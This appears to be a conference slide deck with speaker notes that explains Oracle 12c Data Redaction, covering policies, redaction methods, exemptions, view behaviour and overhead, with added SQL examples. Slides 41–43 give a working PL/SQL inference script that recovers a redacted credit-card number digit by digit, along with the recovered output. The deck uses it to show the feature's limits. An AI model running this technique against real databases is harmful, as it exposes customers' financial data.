4. Follow: @UKOUG
Daniel Da Meda
•18 years of experience using Oracle technologies
•7 years working as a Senior DBA in the UK for a variety of companies such as TimeWarner, Johnson&Johnson, Network Rail and John Deere
•Moved to Angola over 2 years ago, where I continue to work as a Senior DBA providing services for the Ministry of Finance
•Photography enthusiast
http://thatoracledude.blogspot.com/
@ddameda
daniel.da.meda@hotmail.com
http://www.guoa.org/
7. Data Redaction
• One of the new features introduced in Oracle Database 12c
• Part of the Advanced Security option
• Enables the protection of data shown to the user in real time, without requiring changes to the application
8. • Applies protection at query execution time
• The stored data remain unchanged
Redaction takes place immediately preceding the return of selected data and only at the top level of a SELECT list
• It is not an operation shown in the execution plan
9. Policy
SELECT rep.object_name as "OBJECT",
rep.policy_name,
rep.expression,
rep.enable,
rec.column_name as "COLUMN",
rec.function_type
FROM redaction_policies rep,
redaction_columns rec
WHERE rep.object_owner = rec.object_owner
AND rep.object_name = rec.object_name;
OBJECT POLICY_NAME EXPRESSION ENABLE COLUMN FUNCTION_TYPE
------ ----------- ------------------------------------------------ ------ ------ --------------
EMP SCOTT_EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY FULL REDACTION
10. SQL> EXPLAIN PLAN FOR SELECT * FROM EMP;
SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL'));
As SCOTT with the MGR role:
--------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
--------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 |
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 |
--------------------------------------------------------------------------
As SCOTT without the MGR role:
--------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
--------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 |
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 |
--------------------------------------------------------------------------
11. Not to be confused with Oracle Data Masking
With Oracle Data Masking, the data is processed using masked shapes and this updated data is stored in new data blocks. For this reason, Data Masking is more suitable for non-production environments.
** Oracle Data Masking is available only with Enterprise Edition database and it requires licensing of Advanced Security.
12. Below are some other features that already existed to help make the data more secure:
•Virtual Private Database (VPD) - Allows access control at both row and column level by dynamically adding a predicate to SQL statements issued against the database.
•Oracle Label Security - Allows you to add user-defined values to table records, combining them with VPD to allow fine control of who sees what.
•Database Vault - Data Redaction does not prevent privileged users (such as DBAs) from accessing the data being protected. To address this, you can make use of Database Vault.
13. Planning an Oracle Data Redaction Policy
1. Ensure that you have been granted the EXECUTE privilege on the DBMS_REDACT PL/SQL package.
2. Determine the data type of the table or view column that you want to redact.
3. Ensure that this column is not used in an Oracle Virtual Private Database (VPD) row filtering condition. That is, it must not be part of the VPD predicate generated by the VPD policy function.
4. Decide on the type of redaction that you want to perform: full, random, partial, regular expressions, or none.
5. Decide which users to apply the Data Redaction policy to.
6. Based on this information, create the Data Redaction policy by using the DBMS_REDACT.ADD_POLICY procedure.
7. Configure the policy to redact additional columns, if required.
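The planning steps above carried through for the SCOTT_EMP policy listed on slide 9, as an added example (not the presenter's own script): ADD_POLICY creates the policy, ALTER_POLICY adds a second column, and a further policy shows the partial card-number redaction seen on slide 41. SCOTT.EMP and its SALARY column are from the slides; the HIREDATE column and the SCOTT ownership of CUSTOMERS are assumptions.

```sql
-- Added example: run as a user that holds EXECUTE on DBMS_REDACT (step 1).
-- SCOTT.EMP.SALARY is from the slides; HIREDATE and the owner of CUSTOMERS
-- are assumed.

-- Step 6: create the policy. SALARY is a NUMBER (step 2), so FULL redaction
-- returns 0 (slide 19). The expression (step 5) redacts for every session in
-- which the MGR role is not enabled. SYS and SYSTEM hold EXEMPT REDACTION
-- POLICY (slide 31) and keep seeing the real values.
BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP',
    column_name   => 'SALARY',
    policy_name   => 'SCOTT_EMP',
    function_type => DBMS_REDACT.FULL,
    expression    => q'[SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE']',
    enable        => TRUE);
END;
/

-- Step 7: add a further column to the same policy. HIREDATE is assumed to be
-- a DATE, so FULL redaction shows 01-JAN-2001 (slide 19).
BEGIN
  DBMS_REDACT.ALTER_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP',
    policy_name   => 'SCOTT_EMP',
    action        => DBMS_REDACT.ADD_COLUMN,
    column_name   => 'HIREDATE',
    function_type => DBMS_REDACT.FULL);
END;
/

-- PARTIAL redaction in the style of slide 41: mask the first 12 digits of a
-- hyphen-separated 16-digit card number and keep the last 4. REDACT_CCN16_F12
-- is the DBMS_REDACT shortcut for 'VVVVFVVVVFVVVVFVVVV,VVVV-VVVV-VVVV-VVVV,*,1,12'.
-- Expression '1=1' redacts for every session; exemptions come only from the
-- EXEMPT REDACTION POLICY privilege.
BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema       => 'SCOTT',
    object_name         => 'CUSTOMERS',
    column_name         => 'CREDITCARD_NO',
    policy_name         => 'CUSTOMERS_CCN',
    function_type       => DBMS_REDACT.PARTIAL,
    function_parameters => DBMS_REDACT.REDACT_CCN16_F12,
    expression          => '1=1',
    enable              => TRUE);
END;
/
```

After each call, the query from slide 9 against REDACTION_POLICIES and REDACTION_COLUMNS confirms the policy, its expression and the function type recorded for every column.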
16. DBMS_REDACT
• DBMS_REDACT.ALTER_POLICY
Allows changes to existing policies.
• DBMS_REDACT.DISABLE_POLICY
Disables an existing policy.
• DBMS_REDACT.DROP_POLICY
Drops an existing policy.
• DBMS_REDACT.ENABLE_POLICY
Enables an existing policy.
• DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES
Changes the default return value for full redaction. The database must be restarted for the change to take effect.
18. Redaction Methods
• Full redaction
• Partial redaction
• Regular expressions
• Random redaction
• No redaction
19. FULL Data Redaction
•Character Data Types
The output text is a single space
•Number Data Types
The output text is a zero
•Date-Time Data Types
The output text is set to the first day of January, 2001
20. RANDOM Data Redaction
•CHAR Data Types
Redacted in the same character set and byte length as the column definition
•Number Data Types
Redacted in the same character set, with the length limited by the length of the actual data
•Date-Time Data Types
Redacted as random dates that are always different from those of the actual data
31. Operational Activities - No Redaction
•Backup and Restore
•Import and Export
•Patching and Upgrades
•Replication
•Users SYS and SYSTEM automatically have the EXEMPT REDACTION POLICY system privilege
•Data Redaction is not enforced for users connected as SYSDBA
32. Data Redaction and Data Pump
ORA-28081: Insufficient privileges - the command references a redacted object
Use the EXEMPT REDACTION POLICY system privilege in these cases. However, use it with caution.
Note that the role DATAPUMP_EXP_FULL_DATABASE includes the EXEMPT REDACTION POLICY system privilege.
33. Data Redaction and CTAS
In order to perform a CREATE TABLE AS SELECT operation from a table protected by an active redaction policy, the user must have privileges to see the actual data on the source table.
Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege.
34. Redacted Columns and GROUP BY SQL Expressions
Redacted columns included in SQL expressions in a GROUP BY clause will fail as follows (the two SELECTs below show the RANDOM-redacted salaries changing between runs):
SQL> select * from emp;
EMP_NO NAME SALARY
---------- ---------------------------------------- ----------
1 Daniel 702
2 Juca 607
3 Manuel 314
SQL> /
EMP_NO NAME SALARY
---------- ---------------------------------------- ----------
1 Daniel 900
2 Juca 466
3 Manuel 220
SQL> select (salary*1.10) from emp group by (salary*1.10);
select (salary*1.10) from emp group by (salary*1.10)
*
ERROR at line 1:
ORA-00979: not a GROUP BY expression
35. Data Redaction and Views
•Columns from MVIEWS as well as regular VIEWS can be redacted
•Inline views are redacted from the outermost level inwards
•A VPD inline view with the predicate is not affected, as it acts on the actual values
•Redaction policies defined on a VIEW column will override the redaction policy defined on the base table column. Example on next slide
SELECT XYZ … AS SELECT A… AS SELECT B… AS SELECT C…
In the above example, SELECT XYZ is redacted first, then SELECT A, SELECT B and so on
36. Data Redaction and Views
Consider the following policy on column SALARY of table EMP:
OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE
--------- -------------------------------------------------- ------ ------------- ----------------
EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY RANDOM REDACTION
A VIEW named EMP_V is created over EMP, with the following policy defined on its SALARY column:
OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE
--------- -------------------------------------------------- ------ ------------- ----------------
EMP_V SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY NO REDACTION
37. Data Redaction and Views
Selecting from the EMP table:
SQL> select * from emp where name='Daniel';
EMP_NO NAME SALARY
---------- ----------------------- ----------
1 Daniel 706
SQL> select * from emp_v where name='Daniel';
EMP_NO NAME SALARY
---------- ----------------------- ----------
1 Daniel 1001
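The view override from slides 36 and 37, as an added example that is not the presenter's own script: EMP_V is created over EMP and given a NO REDACTION policy on SALARY, then a check query lists every view column whose NO REDACTION policy sits on top of a redacted base-table column. The SCOTT owner is an assumption; the check assumes the view keeps the base column name, as EMP_V does.

```sql
-- Added example reproducing slides 36 and 37. SCOTT as owner is assumed;
-- EMP(EMP_NO, NAME, SALARY) and the MGR-role expression are from the slides.
CREATE OR REPLACE VIEW scott.emp_v AS
  SELECT emp_no, name, salary FROM scott.emp;

-- A NONE policy on the view column overrides the RANDOM policy on EMP.SALARY:
-- sessions without MGR now see the real salary through EMP_V (slide 37).
BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP_V',
    column_name   => 'SALARY',
    policy_name   => 'SCOTT_EMP_V',
    function_type => DBMS_REDACT.NONE,
    expression    => q'[SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE']',
    enable        => TRUE);
END;
/

-- Check: find view columns whose NO REDACTION policy overrides a redacting
-- policy on a base table the view depends on. Column names are matched by
-- name, so a view that renames the column will not be reported.
SELECT v.object_owner,
       v.object_name      AS view_name,
       v.column_name,
       d.referenced_name  AS base_table,
       b.function_type    AS base_policy
FROM   redaction_columns v
JOIN   dba_dependencies  d ON d.owner = v.object_owner
                          AND d.name  = v.object_name
                          AND d.type  = 'VIEW'
JOIN   redaction_columns b ON b.object_owner = d.referenced_owner
                          AND b.object_name  = d.referenced_name
                          AND b.column_name  = v.column_name
WHERE  v.function_type  = 'NO REDACTION'
AND    b.function_type <> 'NO REDACTION'
ORDER  BY v.object_owner, v.object_name, v.column_name;
```

With the objects above in place, the check returns one row: SCOTT EMP_V SALARY EMP RANDOM REDACTION.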
38. Overhead
• It could reach up to 10% performance impact when using complex regular expressions
• Between 2-3% performance impact using other redaction methods
39. Hacking
•Never to be considered as a way to protect data from anyone with SQL access to the database
•Extremely easy to hack once you have access to SQL
•It was never designed to protect data from the attack we will demonstrate
41. Hacking - Finding Actual Values by Inference
SQL> SHOW USER
USER is "WATCHER"
SQL> SELECT * FROM customers;
CUSTOMER_ID NAME CREDITCARD_NO
----------- -------------------- ----------------
1 Daniel Da Meda ************4368
2 Alex Zaballa ************5211
3 Antonio Mateus ************5005
42. Hacking - Finding Actual Values by Inference
SET TIMING ON
SET SERVEROUTPUT ON
DECLARE
  vcreditcard_no CUSTOMERS.creditcard_no%TYPE;
  vcustomer_name CUSTOMERS.name%TYPE;
BEGIN
  FOR a IN 1..19 LOOP
    IF a NOT IN (5,10,15) THEN
      FOR b IN 0..9 LOOP
        BEGIN
          SELECT name
            INTO vcustomer_name
            FROM CUSTOMERS
           WHERE customer_id = 2
             AND SUBSTR(creditcard_no,a,1) = b;
          vcreditcard_no := vcreditcard_no||b;
        EXCEPTION
          WHEN NO_DATA_FOUND THEN
            NULL;
        END;
      END LOOP;
    ELSE
      vcreditcard_no := vcreditcard_no||'-';
    END IF;
  END LOOP;
  DBMS_OUTPUT.PUT_LINE('Credit Card Number for '||vcustomer_name||' is: '||vcreditcard_no);
END;
/
43. Hacking - Finding Actual Values by Inference
vi get_creditcard.sql
[oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev
SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014
Copyright (c) 1982, 2014, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
With the Partitioning, Automatic Storage Management, OLAP, Advanced Analytics and Real Application Testing options
SQL> @get_creditcard.sql
Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211
PL/SQL procedure successfully completed.
Elapsed: 00:00:00.03
For me, Oracle should provide security features for free, especially for Enterprise Edition. But it is just my opinion.
The next slide will show that the execution plans do not change between queries which return redacted data and queries that do not return redacted data.
The above slide shows that a policy named SCOTT_EMP exists for a table called EMP.
The policy is enabled and it is supposed to redact the salary column for sessions that do not have the MGR role.
This slide makes it clear that there is no distinction between execution plans of the same statement with or without data redaction taking place.
The redaction magic must happen right after the TOP level operation of the execution plan and before the data is sent to the client.
Here are some examples of conditional artefacts that can be used to drive redaction policies
Import and Export: Data Redaction policies associated with tables and views are included in the export and import operation. Therefore, the policies are enabled and the data is redacted when users query the objects in the imported database.
SYSTEM has the EXP_FULL_DATABASE role, which includes the EXEMPT REDACTION POLICY system privilege.
Check with Zaballa about replication and Backup&Recovery tasks involving redacted columns
Alternatively, you can perform the export with a user that is exempt from the redaction policy, namely a user that doesn't fall under the redaction criteria.
Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege.
The above example shows a table emp that has a redaction policy enabled on column SALARY.
The redaction method is RANDOM but it could be any other redaction method.
Inline Views
In SELECT XYZ … AS SELECT A… AS SELECT B… AS SELECT C…, SELECT XYZ is redacted first, followed by AS SELECT A, then AS SELECT B, and so on. AS SELECT C is redacted last.
Data Redaction and Views
Here we can see that when we select from a view, redaction does not take place even though the EMP base table has a redaction policy defined on the SALARY column.
According to our tests, it could reach up to 10% performance impact when using complex RegEx, and between 2-3% performance impact using other redaction methods.